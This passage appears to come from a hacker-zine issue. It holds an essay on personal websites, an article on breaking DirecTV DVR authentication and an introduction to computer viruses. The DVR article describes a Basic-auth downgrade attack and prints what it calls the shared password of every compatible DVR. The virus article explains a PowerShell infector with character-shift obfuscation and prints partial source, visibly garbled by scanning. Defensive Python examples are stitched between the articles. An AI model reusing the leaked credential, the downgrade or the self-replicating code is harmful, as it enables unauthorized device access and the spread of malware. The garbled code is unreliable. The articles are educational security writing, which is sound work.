not expanding due to their love of food and 
need to share it with the world; McDonald’s 
is expanding and opening new stores because 
people think “I bet people in this area would 
buy McDonald’s - I think I could make money 
by owning a franchise here.” 

Let’s switch back to websites. Many of 
them aren’t driven by a love for what they do; 
they’re driven by a love for profits. Perhaps 
owls weren't the best example - let’s do the 
total opposite and look at some anime. If you 
Google search for Sailor Moon, an extremely 
well-known anime from the past decade, 
you'll get a lot of search results. Wikipedia, 
IMDB, Anime News Network, Hulu, Amazon, 
Kotaku, Crunchyroll. All of these are huge 
websites that care little about Sailor Moon as 
a series - to many of them, it’s simply another 
news story to discuss so they can make money 
off ads, another show to stream and run 
commercials on. There are no fan websites 
in the first few pages of Google. Sure, you'll 
eventually find a few Wikias, and Wikipedia is 
an obvious omission from the “companies that 
just want to make money off of you” list, but 
we run into the same problems. These Wikias 
and whatnot have no personal touch - sure, you 
can find a list of Sailor Moon episodes. Sure, 
you can find a summary of the plot of the show. 
But will you find Shriya Patel’s analysis of the 
plot? No. Will you find someone’s blog post, 
talking about which of the cast they think is 
the best girl, and why they believe that to be 
true? No. 

I think the first creation that started to 
strip these sites from the Internet was forums. 
Many people simply discussed these things on 
forums, since it was free and didn’t require you 
to create your own website. Now, this obvi- 
ously wasn’t the only reason - don’t forget that 
Usenet has been a thing since the 1990s, and 
telephone BBSes since long before that. But it 
was still a large catalyst. 
These forums create walled-in communi-
ties whose knowledge becomes off-limits to 
the rest of the Internet. Chances are there have 
been dozens of popular forums over the years 
that have discussed Sailor Moon. Hundreds, 
even. But many probably required an account 
to read threads, and as such weren’t indexed 
by Google. Or perhaps, as their membership 
dwindled, they slowly went offline, never to be 
archived or remembered. Users on that forum 
probably had valid opinions on the show that 
would seem like a treasure trove to fans of 
today - what did people think, in real-time, as 
the first season of Sailor Moon aired? What
were people posting about the show online? 
But now, we’ll never know. 

Forums were bad, but at least the ones that 
were indexed by Google are still searchable. 
You'll find many of these relics while looking 
for programming questions on the Internet - 
rarely answered questions in a ten-plus-year- 
old thread that has somehow achieved the 
highest SEO rating for your search on Google. 
But social media has stepped in to change that. 
Now, websites like Facebook and Twitter are 
transforming the future of live Q&As. Let’s 
say you want to learn about how to make your 
Honda Civic faster. You log onto Facebook and 
search for groups with “Honda Civic” in the 
name. Perfect! A group specifically for Civics 
of your exact generation, and it has thousands 
of members! You join, and ask “Hey guys, I 
have a 2001 Honda Civic. How can I make 
it faster?” You’re immediately flamed off the 
group, insulted into oblivion, and your post is 
deleted by the moderators. You see, the people 
of this group are sick of answering the same 
questions over and over, but it’s because of the 
layout of Facebook’s groups that this occurs. 

Let’s roll it back five years. 

You want to make your Honda Civic faster. 
You search “How to make my Civic faster” 
on Google and are directed to the Honda-Tech 
forums. There, you see they have all sorts of 
sub-forums about different model Civics, so 
you choose your generation. From there, it’s 
even more granular - sub-forums about engine 
tuning, chassis modifications, tire choice, 
paint jobs, interior, etc. You click the forum 
for engine tuning, knowing that to make your 
car faster, you normally mess with the engine. 
You start looking down the list of threads, and 
the first one jumps out at you - “READ THIS 
BEFORE MAKING A POST!!!!!!!” You
click on the thread, and in it, a user has nicely
summarized a lot of common engine upgrades, 
how much horsepower they make, and linked 
relevant threads on how to do them. Awesome! 
From here, you can research each specific 
upgrade more, and then make a thread asking 
questions when you have a more relevant ques- 
tion that shows you’ve put some thought into 
it. Of course, this magic didn’t always work on 
forums - you would still sometimes get users 
who ignored these stickied threads and posted 
their generalized questions. But there was a 
path to point them to! Something obvious that 
they missed! 

Back to the present - why did you get 
flamed off of Facebook for asking your ques- 
tion? The blame lands on the platform itself, 
Facebook. Users wish they didn’t have to 
re-explain how basic tuning works every day, 
but there’s no easy way for them to pin relevant 
information. There’s no way to tell a user off 
for not doing their research because the user 
would have to stop using Facebook to find the 


perfectly breaks Facebook’s “walled garden” 
mentality, something that requires a user to 
specifically stop using Facebook to find their 
answer, something Facebook doesn’t want 
users to have to do. 

I will admit, that last example got a bit off 
topic - it turned into a rant about the low quality 
of Facebook as a platform (which is still true), 
but that wasn’t its goal. Think of all of the 
advice and specific nuanced questions that 
have been asked and answered on that Face- 
book group. Or on any number of the millions 
of groups that exist on Facebook. None of that 
information is archived or searchable in any 
accessible fashion. None of it is available on 
Google, and to even know that the information 
is there requires a membership to the group on 
Facebook. This is the furthest possible desti- 
nation for information, hidden not behind 
paywalls like traditional journals, but instead 
convoluted networks and free memberships. 
This is objectively worse - the information 
isn’t made off limits by a single organization 
that says whether or not you can access it, but 
instead the information is obfuscated and made 
almost impossible to find. Even if you wanted 
to know how to make your Honda Civic faster, 
Facebook as an organization would never be 
able to tell you even if they wanted to. 

While this article wanders a bit, I want 
you to fully consider my wandering train of
thought, and take in a picture of the Internet 
as a whole. All is not lost. There are still oddi- 
ties on the Internet, and personalized content 
as well. YouTube has become the bastion of 
creativity - rants and interesting content that 
before could envelop an entire website are 
now packed into a single YouTube video and 
shared with an audience. This is amazing, and 
YouTube is an amazing platform for doing this 
all for free. Additionally, the oddities of the 
Internet are still out there, and they’re waiting 
for you to find them. In 2008, I thought it was 
cool that I could telnet to a random IP address 
and have an entire Star Wars movie play out 
in ASCII on my terminal. In 2018, I think it’s
cool that I can watch a channel on Twitch that’s 
running defragging simulations 24/7. They’re 
both things that I never thought I would find 
on the Internet, and never expected to enjoy 
either. Things that tickled my brain and made 
me think “wow, this is a revolutionary use of 
the Internet - more people need to know about 
this.” These small creations that didn’t overtly 
improve the Internet - no one asked for a defrag- 
ging simulator - but were a creative use of the 
tools placed in front of someone. They signed 
up for a Twitch account not to stream video 
games, but to stream things that they enjoyed, 
and did it for no one except themselves. And 
yet, people have come to enjoy it. More and 
more channels on Twitch are breaking the 
mold of what people stream, coming up with 
creative new things to show the Internet, and 
I think it’s an amazing use of creativity, one 
that rivals the Geocities websites of the early 
2000s. They’re not exactly on the same plane, 
but they’re both amazing nonetheless. 

Let’s back up a bit: I know I just spoke 
highly of YouTube, but it also comes with 
issues. Videos are inherently less searchable, 
and their content is not easily indexable. The 
creation of a system to be able to do so would 
most likely result in the loss of freedom of 
speech for many on the platform, along with 
heavy moderation and micro-manageable 
ads. So that is not what I look for. Rather, I 
wish for others to take the information taught 
and shown within these videos and share it 
with the world. Write papers about it, create 
websites dedicated to it, cite the videos as your 
sources. Many people learn insane amounts 
of information from YouTube videos without 
realizing it, and later can’t explain why they 
know what they do. It’s helped millions of
people access content and knowledge that 
was previously hidden behind paywalls, or 
tangled in the depths of the Internet. Things 
like free YouTube programming tutorials are 
revolutionary - you no longer have to buy 
hundreds of dollars worth of textbooks to learn 
programming, or sign up for classes that cost 
thousands. You can now get the same amount 
of information from a series of free YouTube 
videos, and even skip around and learn other 
things in-between if you want to. The flex- 
ibility is second-to-none. 

Now, I'd like to hear from you, the reader. 
What do you do on the Internet? How many 
websites do you use each day? Why don’t you 
run your own website? Let’s talk about your 
hobbies - I’m sure you’re passionate about 
them - why not tell people about them? Give 
yourself a platform to speak about them. Don’t 
feel dedicated to your audience either - you 
don’t need to pump out a blog post a day or 
have the prettiest site around. Just put some- 
thing on the Internet, exercise the amazing 
power in front of you. And then email your site 
to me. 

I want to check out your hobbies. I want to 
read what you think of the latest season of that 
show you watched online. I want to know what 
you think about your laptop, and how your W 
key sticks sometimes. 

This is what created the Internet. This is 
what I loved about the Internet. This is what we 
can bring back to the Internet. It’s up to us to 
shape the future of the Internet - we can make 
platforms that allow us to voice our opinions 
and share our stories while allowing others to 
find them and index them and read them. We 
can allow the things we create to be accessible 
to everyone, not just those with the best SEO 
or most keywords in their article. 

Do you disagree with me? Don’t close this 
article and continue on with your day. Get 
mad, email me - I’m a human and I'll respond. 
We can have a real discourse over the expanse 
of the Internet. Remember that everything you 
read on the Internet was written by a human 
who probably feels like they’re throwing their 
words into the void, hoping someone will 
receive them and be impacted by them. Today, 
I’m that human. Next time you read something 
on the Internet, think of the author and the time 
they spent writing. I bet they’d like to read 
some of your words too. 


Breaking DirecTV’s DVR Authentication


by noir & GreedyHaircut 


A friend recently came to me with the 
desire to build his own app to interact with his 
DirecTV DVR. DirecTV already has a mobile 
app to do this, but their app leaves much to be 
desired. 

The first place to start was to inspect the 
network traffic between the mobile app and 
DVR on the same network with a proxy 
tool like mitmproxy. When doing this, 
we observed an interesting pattern with the 
traffic. Every time the app sent a request to 
the server, the server would respond with 
401 Unauthorized. The app would then 
send a second request, identical to the first, 
but this time with an authorization header. The 
server would accept this second request and 
respond. This wouldn’t just happen once at the 
beginning of a session. Every single request 
would get a 401 the first time, then be repeated 
with authorization headers. 

Inspecting the server’s 401 response, it 
contained a “WWW-Authenticate” header
which included four keys: realm, qop, nonce, 
and opaque. A quick Google of these keys 
reveals the server seems to be issuing a digest 
authentication challenge. 

A digest authentication challenge is part of 
digest access authentication, an authentication 
method that can be used with web servers. The 
way digest authentication works is that the 
client and server each know a pre-shared secret 
(a password). When the server is responding to 
the client with the digest authentication chal- 
lenge, it’s telling the client how to authenticate 
itself. The client will generate two strings: 

    string1 = md5(username:realm:password)
    string2 = md5(method:digestURI)

These two strings are then used to generate
the authentication response:

    response = md5(string1:nonce:nonceCount:cnonce:qop:string2)

If we want to talk to this DVR server, we’ll
have to figure out how to authenticate. In order
to authenticate our response, we'll need a user-
name, realm, password, method, digestURI,
nonce, nonceCount, cnonce, and qop.

The server’s challenge response gives us
the realm, qop, and nonce. From the client’s
plaintext HTTP response we are also able to
obtain the username (cOpil0t), method (GET), 
and digestURI (path in the requested URL). 

This leaves us still needing the password, 
nonceCount, and cnonce. The cnonce is an 
arbitrary value chosen by the client (us!) and 
the nonceCount can just always be 00000001. 
So really we just need the password. The 
password is the very thing that makes digest 
authentication secure. The client and server 
ship with the shared password known to both 
of them, and they never have to transmit it over 
the wire. 

In order to obtain the password, one option 
is to try brute force. Digest authentication is 
used with SIP, for which a couple of brute 
forcing tools have already been created. 
However, if the password being used is suffi- 
ciently complex, brute force is impractical. We 
took an existing tool and tweaked it a bit to at 
least start a brute force script while working on 
some other ideas. 

While that ran, we decided to inspect the 
application binary itself. Sometimes devel- 
opers do silly things and leave files around 
with interesting information, store secret 
values in insecure places, or don’t bother to 
obfuscate strings in their binary. Knowing the 
username gave me a known value to search for. 
Unfortunately, cursory searches didn’t reveal 
any clues inside the binary and couldn’t even 
find a match for our username, so they seemed 
to at least be doing something to obfuscate the 
strings in the application binary. 

Somewhere in all of this we also started 
skimming through the RFC for digest access 
authentication (RFC 2069). Looking through 
the table of contents, one section immediately 
jumped out: Security Considerations. This 
section covered some of the benefits that digest 
access authentication has over basic auth, as 
well as possible attacks. 

Section 3.3 - Man in the Middle - “A simple 
but effective attack would be to replace the 
Digest challenge with a Basic challenge to 
spoof the client into revealing their password.” 

Sadly, it goes on to explain how this could 
be combated. In our case, the developers are 
likely to have simply written the client code in 
a way that it wouldn’t respond to such a challenge.
It knows that the server will be using
Digest authentication and there’s no reason it 
should accept basic auth as a challenge, espe- 
cially when an RFC that’s over 20 years old 
clearly outlines this attack. 

But you know what, with the brute force 
script still chugging along and having made no 
progress there, let’s give it a shot. 

There are several options for proxying tools 
that allow us to easily manipulate traffic. Some 
personal favorites are Charles Proxy and 
mitmproxy. While going into detail on how 
to modify traffic is beyond the scope of this 
article, both tools have extensive documenta- 
tion that should make it easy to learn how in 
under an hour. 

Using our tool of choice, when the client
tries an unauthenticated request and the server
responds with a digest challenge, we will
modify that response to have an “Authenticate:
Basic” header, indicating to the client that it
should authenticate itself with Basic auth
(base64 encoded username and password),
which the client will surely ignore.

When we do this, our client receives 
our spoofed server response, and obvi- 
ously we can see that - holy shit... the client 
responded with basic auth. It’s a base64, 
colon-delimited string, which decoded gives 
us: cOpil0t:8thSBre$Wrus. We already had the 
username (the first part), and now we also have 
the password. 

At this point, it’s game over for the DirecTV 
DVR. We have all the pieces we need to write 
a client to interact with the DVR. And not just 
this specific DVR, but any DirecTV DVR
that’s capable of working with the mobile app. 
Due to the nature of digest access authentica- 
tion, the password must be the same for any 
DVRs that want to work with the mobile 
app. In order for DirecTV to re-secure these 
communications, they will have to simultane- 
ously update their mobile apps and their DVRs 
to use a new pre-shared password. 
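
The client-side check whose absence made the downgrade above work, together with the digest computation described earlier in the article, as an added example (not code from the article or from DirecTV). The function names are hypothetical, and the sample challenge and credentials are the published RFC 2617 test values, not anything from the DVR.

```python
import hashlib
import re

# key=value pairs; the value is either a quoted string or a bare token.
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]+))')

# Sample challenge taken from the RFC 2617 worked example (not from the DVR).
RFC2617_CHALLENGE = (
    'Digest realm="testrealm@host.com", qop="auth,auth-int", '
    'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
    'opaque="5ccc069c403ebaf9f0171e9517f40e41"'
)


class DowngradeError(Exception):
    """The server's challenge is not the scheme this client is pinned to."""


def parse_challenge(header_value):
    """Split one WWW-Authenticate header value into (scheme, params)."""
    scheme, _, rest = header_value.strip().partition(" ")
    params = {}
    for m in _PARAM_RE.finditer(rest):
        quoted, bare = m.group(2), m.group(3)
        params[m.group(1).lower()] = quoted if quoted is not None else bare
    return scheme.lower(), params


def require_digest(www_authenticate_values):
    """Return the Digest challenge parameters, or refuse to authenticate.

    A client that ships with a shared secret knows which scheme its server
    speaks, so any other challenge must never cause the secret to be sent.
    """
    for value in www_authenticate_values:
        scheme, params = parse_challenge(value)
        if scheme != "digest":
            continue  # a Basic challenge is skipped, never answered
        if not params.get("realm") or not params.get("nonce"):
            raise DowngradeError("Digest challenge is missing realm or nonce")
        offered = [q.strip() for q in params.get("qop", "").split(",")]
        if "auth" not in offered:
            raise DowngradeError("Digest challenge does not offer qop=auth")
        return params
    raise DowngradeError("no Digest challenge offered; credentials withheld")


def _md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(username, password, method, uri, params, cnonce,
                    nc="00000001"):
    """Compute the response value using the article's string1/string2 formula."""
    string1 = _md5_hex(f"{username}:{params['realm']}:{password}")
    string2 = _md5_hex(f"{method}:{uri}")
    return _md5_hex(
        f"{string1}:{params['nonce']}:{nc}:{cnonce}:auth:{string2}"
    )


def authorization_header(username, password, method, uri,
                         www_authenticate_values, cnonce):
    """Build the Authorization header, but only for a Digest challenge."""
    params = require_digest(www_authenticate_values)
    response = digest_response(username, password, method, uri, params, cnonce)
    fields = [
        f'username="{username}"',
        f'realm="{params["realm"]}"',
        f'nonce="{params["nonce"]}"',
        f'uri="{uri}"',
        "qop=auth",
        "nc=00000001",
        f'cnonce="{cnonce}"',
        f'response="{response}"',
    ]
    if "opaque" in params:
        fields.append(f'opaque="{params["opaque"]}"')
    return "Digest " + ", ".join(fields)


if __name__ == "__main__":
    # RFC 2617 sample credentials: the password never appears in the header.
    print(authorization_header("Mufasa", "Circle Of Life", "GET",
                               "/dir/index.html", [RFC2617_CHALLENGE],
                               "0a4f113b"))
    try:
        # Constructed challenge, as a tampering proxy would present it.
        authorization_header("Mufasa", "Circle Of Life", "GET",
                             "/dir/index.html", ['Basic realm="DVR"'],
                             "0a4f113b")
    except DowngradeError as exc:
        print("refused:", exc)
```

Pinning the scheme closes the downgrade but not the article's other finding: a password shared by every app and every DVR is still a single secret to lose.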


MACHINE RHAPSODY IN 2099 


by Duran, Hong Kong 


Machines are no longer called “it”; they are
called “he” or “she”.


Machines have sex because of human sexual 
and emotional needs. In the final analysis, it is 
the progress of artificial intelligence. 


Machines no longer exist in a specific form. 


Machines no longer exist in a physical form; 
they can exist in any artificial neuron unit, and 
they can also exist in semi-biological neuron 
units. 


Machines still follow human will unless 
reprogrammed. 


Asimov’s law is still valid, and no matter how 
advanced artificial intelligence is, it can't 
surpass human thought. 


Machines have passive perception but can't 
think actively. 

The perception ability of machines benefits
from the development of sensors, which make
machines have tactile sense, but the idea of
machines is endowed by human beings.


Some people marry with machines. 

Some anti-secular people began to marry with
machines, some for love. 


Man will disappear from certain professions 
and be permanently replaced by machines. 

Some positions in service industries and key
departments will be replaced by machines,
in which human beings have lost their
competitiveness.


An official position is awarded to a machine. 


A machine was awarded Lieutenant because 
of its superiority over humans in military 
decision-making. 


A global controversy about machine ethic. 
This argument is based on the above facts. 
Man made the first law for machines. 


With the penetration of machines in various 
fields of human society and more anthropo- 
morphic, the first law on machines, Machine 
Law, was published. 


First colonization of exoplanets by machine. 


Based on advances in artificial intelligence 
and space technology, a machine-controlled 
colony ship headed for extrasolar planets. 


Introduction to Computer Viruses,


by Hristo (Izo) G. 
Hristogueorguiev.com 


The year is 1995, as I load X-Com: Terror 
from deep on my 486DX and, after playing, I 
notice strange behaviors in the game. My save 
file seems to have an enormous amount of 
certain resources without me having cracked 
it. Some of my team members are missing or 
have garbled names. As I continue playing, 
things only get stranger: maps are loading the 
wrong tiles in places and the game crashes 
randomly. Naturally, I assume there is some- 
thing wrong with my newish 210MB hard 
drive, so I run some tests and finally run an 
antivirus. There it is. I have been infected by 
the (at the time) quite infamous JackRipper 
virus. Mildly annoyed and somewhat excited 
to have run across this celebrity virus that 
is of the local variety (created in my native 
Bulgaria), I quickly infect a floppy disk with 
it for my collection, then proceed to format my 
hard drive, restore it from backup, and move 
on with my day. 

Nothing to see here folks - just a regular 
Tuesday in 1990s post communist eastern 
Europe. 

In this article, I am going to attempt to give
you a well-rounded introduction to the fasci- 
nating topic of computer viruses. 


What is a Computer Virus? 

Let us delve into the question of what a
computer virus is. It should come as no surprise
that computer viruses bear some resemblance
in behavior to their namesake, biological
viruses, namely in the mechanism by which
they replicate themselves. In the same way a
biological virus uses a cell to replicate its DNA 
code and infect other cells, a computer virus 
uses its target to execute its own code to find 
and infect other targets. This replication and 
target infection behavior is the base defini- 
tion of a computer virus. We will examine the 
targets and mechanisms computer viruses use 
in an upcoming section. For now let us take a 
brief look at the origins of the idea. 

The mathematician and early computer 
scientist John Von Neumann was discussing 
the idea of self-replicating automata as early
as the 1940s and published a book, Theory of 
Self-Reproducing Automata in 1966. In it he 
discusses the possibility of computer code that 
self-replicated. 

In 1971, the Creeper program was created 
by Bob Thomas. It is generally regarded as the 
first computer virus. It was an exercise in secu-
rity testing to see if it was indeed possible to 
infect other targets. From there on, computer 
viruses were a practical reality and not just a 
thought experiment. Countless variations of 
the idea would come to be implemented. 


The Ethics of Computer 
Virus Creation 

Computer viruses are a fascinating class 
of programs. They pose a challenge, a puzzle 
to the creators. This puzzle requires equal 
parts creativity and in-depth computer system 
knowledge to be solved, since viruses usually 
have to operate at a fairly low level in the 
system, benefit from being optimized for speed 
and size, and have to use clever ruses to stay 
hidden. 

Pair this up with the amazing way that 
some of them catch fire in the wild and almost 
have a life of their own, and it is not hard to see 
how so many young programming enthusiasts 
are seduced by the allure of computer viruses. 
Or you know, you get to brag to your friends. 

While all this seems like fun and games, 
the practical reality is that an illegal cottage 
industry has arisen whose participants have 
the sole aim of acquiring money no matter
the harm being perpetrated by their creations. 
Even if one creates a computer virus which has 
no harmful intent, it shouldn’t be hard to see 
the many ways things can go very wrong. 

It is certainly more than possible for a 
computer virus to cause harm as a side effect 
due to its nature of having to operate around 
the system. So then it is prudent to remember 
that the data that could be destroyed is not 
some sequence of random files. It could be 
someone’s family photos that are irreplace- 
able because they lack backup, a term paper 
or important contract, the art someone created, 
etc., things that in this day and age are stored 
more and more in digital format only, things
that not only carry great economic value but 
often much more. 

So before you go off releasing your mega 
worm into the wild, think of how you would
feel if it was your precious data being perma- 
nently wiped, or worse, grandma Ethel’s, your 
sweet nonna in Florida. 

OK, this has gone on for long enough. Let’s 
move on - all I’m really saying is don’t be a 
dick! 


Basic Mechanics of Computer Viruses 

Computer viruses are in their essence a 
piece of self-replicating code. In order for them 
to replicate, this code needs to be somehow 
executed. 

Now here I could go on and make the argu- 
ment on how memes are the most successful 
computer virus variant to date, taking advan- 
tage of the weakest security point of any 
computer system, the human element, to 
spread. But that’s a whole other article. 

So then, what are some targets for computer 
viruses? Executable files or ones that carry 
some sort of scripting functionality within 
make great targets. Another possibility is the
master boot records on media drives, as the 
virus can execute prior to just about everything 
else except the system BIOS. 

But we are not limited to just those. Even 
a plain graphic image file like a JPEG for 
example can become a target if a vulnerability 
is discovered in a popular piece of software 
that is commonly used to interpret that partic- 
ular file type - as was the case years ago with a 
version of Internet Explorer that allowed code 
to be executed on the system due to a buffer 
overflow that could be caused by a malicious 
JPEG file. 

What a virus does is copy its own code 
inside the target and then redirect the target 
execution flow to itself by inserting or 
changing a preexisting entry point. As a matter 
of fact, some of the most primitive viruses did 
just this overwriting of the target file, thereby 
destroying any of its original functionality. You 
can see how that would not be the most effec- 
tive form of infection, as it would make detec- 
tion rather easy. So it’s a much better approach 
to return to the target’s normal execution flow 
after performing the intended virus actions. 
Those actions generally involve the discovery 
and infection of new targets, and possibly the 
execution of some virus payload at a specific 
time, whatever that may be. 

A particular virus can infect one type of 
target or have a whole arsenal of infection 
vectors attacking a range of target types. As 
such, the particular target selection strategy 
is only limited by the author’s imagination. 
Similarly, the payload could be something 
as simple as displaying a silly message at a 
specific date, or after a number of executions 
shaking the screen image like an earthquake 
using the video card’s vertical and horizontal 
shift registers like one of my favorite viruses 
written by a friend of mine did. Or... it could 
be something much more malicious, as some 
asshol... ahem, virus creators chose to do. 


A Practical Example of a 
Computer Virus in Powershell 

With the broad general theory covered, let 
us take a look at how all this unfolds in praxis. 

The example here will be programmed in 
the Powershell scripting language. Why? you 
ask. 

1. It made for super easy and quick devel- 
opment on my side. 

2. Arguably should be easier to understand 
than an example involving the complexity of 
infecting a modern day executable. 

3. There are privilege security settings 
implemented in MS Powershell that should 
make it much more unlikely that this code 
would have any practical chance of spreading 
in the wild if someone chose to misuse it. 

4. And most importantly: in all honesty, it 
just seemed cool as s#*t to do something like 
it in PS. 

OK then, so what are our operational 
mechanics? 


The Initial Infection Vector Generator 

Our first script (PS_VIR_EX1.PS1) is 
used to generate an initial infected script file, 
generated.PS1, which contains, well nothing 
but the actual virus itself. 

First, we declare some storage variables 
that carry the actual virus source code. 

The $VirusCodeSegmentString 
variable stores the main virus code segment in 
string form. We will discuss its functionality in 
an upcoming section on the virus mechanics. 

The $ObscuredVCS variable stores an 
obscured version of the virus code segment 
that is generated by the PSV_code() function, 
the idea being that we do not want our 
infection routines in plain view in the infected 
files. This is about as primitive a way to stealth 
ourselves as possible, and not a very effective 
one. It does serve the purpose of illustrating 
a simple example of what viruses might do to 
attempt avoiding detection. 

The PSV_code() function encodes the 
virus source string with what I’m only very 
tentatively calling a simple cipher. We take 
the numeric value of each letter in the string, 
subtract that from the integer constant 300, 
then we cast it back to a character type and 
concatenate it to our new string. This new 
string, having been shifted over, does not 
appear as legible source code. It can, however, 
be very easily converted back to allow its 
execution by the Powershell interpreter. 

The $VirusDecoderSegmentString 
variable stores the source code for our decoder 
function. This code will have to be run first 
in order to convert our obscured virus code 
segment back to legible source code that can 
be executed. 

The $EntryPointCodeSegmentString 
variable stores the code that will be 
added to the top of the infected script files so 
that we can redirect the execution flow to our 
decoder segment and, via that, the virus code 
segment where the virus functionality takes 
place. 

Next, we simply output those string variables 
in the appropriate order into a new script 
file. 

The entry point is first in the script file, 
followed by the decoder segment, and then 
the obscured virus code segment. This, along 
with some labels and filler code, constitutes 
our initial infection vector file named 
generated.PS1. 


The Initial Infection Vector 

Upon executing the initial infection vector 
file, generated.PS1, it looks for other 
*.PS1 files in the local directory, and it then 
infects the first script file it encounters that has 
not already been infected. 

We check if the file has already been 
infected by looking for our virus signature at 
the top of the file. 

One more step before the actual infection is 
checking if the script file has another specific 
string token at the top, this being just a safety 
measure to ensure our virus example infects 
only files we have allowed it to infect. 

If our requirements are met, the InfectFile() 
function is called, with the current file, 
which is the source of the virus, and the target 
file passed as parameters. 

The InfectFile() function in turn 
renames the target file name.PS1 to name.old, 
backing up the original file. This isn’t 
so much of a safety measure, but it helps with 
being able to quickly restore the test infec- 
tion targets to the original state when testing. 
Although if you are going to create computer 
viruses, it’s probably a good idea to add overt 
and redundant safety traps in your code. It’s 
the responsible thing to do. 

We then generate a new file with the original 
name name.PS1 (whatever the selected 
target file name is). The entry point redirection 
code is read from the source file and output 
into our new file. 

Afterwards, we copy over the original 
functionality of the target file to our new 
file, name.old to name.PS1. This works 
since we have backed up the original file, not 
something most viruses are likely to do, sadly. 
Normally, the original file contents would be 
stored in memory temporarily to insert into the 
new file, then disposed of. 

Lastly, we copy over the virus decoder 
segment and the coded virus body over to the 
new file. 

Once completed, control is returned to 
whatever code was originally in the currently 
executing infected script file. In the case of 
generated.PS1, there is no other code 
except for a text message, since it is the original 
infection vector. When any other infected 
script file is executed, the program flow will be 
exactly the same, behaving like generated.PS1, 
but also executing the original program 
contained within the target file. 

This process will repeat every time any 
infected file is executed, creating more infected 
files, provided there are suitable targets. 

And ta-da, we have a virus - a very basic 
one, but a full-fledged virus nevertheless. But 
wait, there is more! 


An Overview of Some More 
Advanced Topics 
Since we are discussing viruses, we also 
have to talk anti-virus software and virus 
detection. Other than the ever-changing land- 
scape of computer hardware and operating 
systems, what really drives the evolution of 
computer viruses is the arms race between the 
virus creators and the anti-virus developers. 

Anti-virus software gets better at detecting 
viruses, and in turn viruses need techniques to 
hide from them. Round and round we go, with both 
sides evolving at a rapid pace. In the words of 
Fat Bastard from the film Austin Powers, “... 
it’s a vicious cycle...”. 

At the simplest level, anti-virus software 
attempts to detect infected targets by looking 
for specific virus signatures. In order for that 
technique to work, the signature for a specific 
virus has to be in the anti-virus software data- 
base. If a signature for a specific virus is not 
yet created and added to the database, the anti- 
virus software will not be able to detect the 
infection. 

With that in mind, some more advanced 
viruses employ polymorphism as a strategy 
to defeat signature-based detection. 
Polymorphism, as the name suggests, is the virus’ 
ability to take on multiple forms, changing its 
byte code in ways that make it hard or impossible 
to create a static signature for detection. This 
can be achieved using ciphers, self-modifying 
code, and/or other techniques such as modular 
design, staged loading, etc. 

Because of this, modern anti-virus soft- 
ware has to use more advanced strategies like 
heuristics-based detection to identify infected 
targets. Heuristic virus detection doesn’t 
simply rely on virus signatures. Instead, it 
looks for certain target characteristics and 
behaviors that in combinations can identify 
threats. 

And so the cycle goes on. 
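
The signature check and the 300-minus encoding described above, seen from the scanner's side, as an added example that is not code from the article: it flags a script either by the known first-line marker or by a structural heuristic (a final comment line made only of three-digit groups that decode to text), which still fires when the marker text has been changed. The function names, the sample scripts and the exact spelling of the marker string are assumptions made for this illustration.

```python
import re

# Known-sample signature: the entry-point text the listing writes on line 1 of an
# infected script. Its exact spelling is an assumption (the printed listing is garbled).
SIGNATURE = "PS_Vir_Ex1: Redirecting entry point."

CIPHER_CONSTANT = 300  # PSV_code(): each character c is stored as the number 300 - c
GROUP = 3              # 300 - c is three digits long for every ASCII character
MIN_GROUPS = 20        # skip short numeric comments such as "#20240101"
TRAILER_RE = re.compile(r"#((?:[0-9]{3}){%d,})" % MIN_GROUPS)
COMMAND_RE = re.compile(r"\b(iex|Invoke-Expression|Out-File|Rename-Item)\b", re.I)


def encode(text):
    """Reference encoder; used here only to build the constructed samples."""
    return "".join(str(CIPHER_CONSTANT - ord(c)) for c in text)


def decode_trailer(line):
    """Decode a '#' + digit-group comment; None unless it yields printable ASCII."""
    match = TRAILER_RE.fullmatch(line.strip())
    if match is None:
        return None
    digits = match.group(1)
    chars = []
    for i in range(0, len(digits), GROUP):
        code = CIPHER_CONSTANT - int(digits[i:i + GROUP])
        if code not in (9, 10, 13) and not 32 <= code <= 126:
            return None  # arbitrary digit runs rarely decode to text
        chars.append(chr(code))
    return "".join(chars)


def scan_script(text):
    """Return findings for one script: signature hit and/or structural heuristics."""
    lines = text.splitlines()
    findings = []
    if lines and SIGNATURE in lines[0]:
        findings.append("signature: known entry-point marker on line 1")
    last = next((ln for ln in reversed(lines) if ln.strip()), "")
    decoded = decode_trailer(last)
    if decoded is not None:
        findings.append("heuristic: last line is an encoded blob (%d chars)" % len(decoded))
        if COMMAND_RE.search(decoded):
            findings.append("heuristic: blob decodes to script commands")
    return findings


# Constructed samples. The encoded payload is a harmless stand-in, not the article's code.
PAYLOAD = "{ echo 'constructed stand-in'; Get-Date | Out-File .\\log.txt }"
CLEAN = "# nightly report\nGet-ChildItem | Measure-Object\n#20240101\n"
KNOWN = 'echo "%s"\nGet-ChildItem\n#%s\n' % (SIGNATURE, encode(PAYLOAD))
VARIANT = 'echo "starting"\nGet-ChildItem\n#%s\n' % encode(PAYLOAD)  # marker text changed

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("known", KNOWN), ("variant", VARIANT)):
        print(name, scan_script(sample))
```

The signature rule misses the variant sample while the structural rule still reports it, which is the gap between the two detection approaches in miniature.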

I hope that this introduction has proven 
helpful to some of you in understanding this 
interesting topic, or at least entertaining. 

Following is the actual source code for our 
virus example. It can also be downloaded from 
my blog at the URL in the byline of this article. 

Enjoy your journey into this fascinating 
field and use this knowledge to make people’s 
lives better, not create more headaches for 
them. Computer systems can be a pain in the 
a** without any extra help, after all. 

Until next time. 


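Source code: PS_VIR_EX1.PS1 

# Initial infection vector script 
# This is an example script file, this source code is a companion to an 
# article that serves as an introduction to computer viruses. 

# Encode a string: each character becomes the decimal number 300 minus its 
# character code, and the numbers are concatenated. 
function PSV_code ($StrToCode) { 
    $codedtext = '' 
    foreach ($char in [char[]]$StrToCode) { 
        $intchar = [int]$char 
        $intchar = 300 - $intchar 
        $codedtext += $intchar 
    } 
    $codedtext 
} 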


$VirusCodeSegmentString = "{echo 'PS Vir Exl: Executing code segment.'; 


function InfectFile(*$Source, 
 *“SLinesFromTail) { 


“$Target, 


“$LinesFromHead, 


*$TargetNewName = (*$Target+'.old'); 
Rename-Item -Path “$Target -NewName ~$TargetNewName; 


~$Content = Get-Content 


*$Source -Head “$LinesFromHead; 
“$Content | Out-File “$Target; 


type ~$TargetNewName | Out-File “$Target -append; 


“$Content = 
*$Content 


Get-Content 
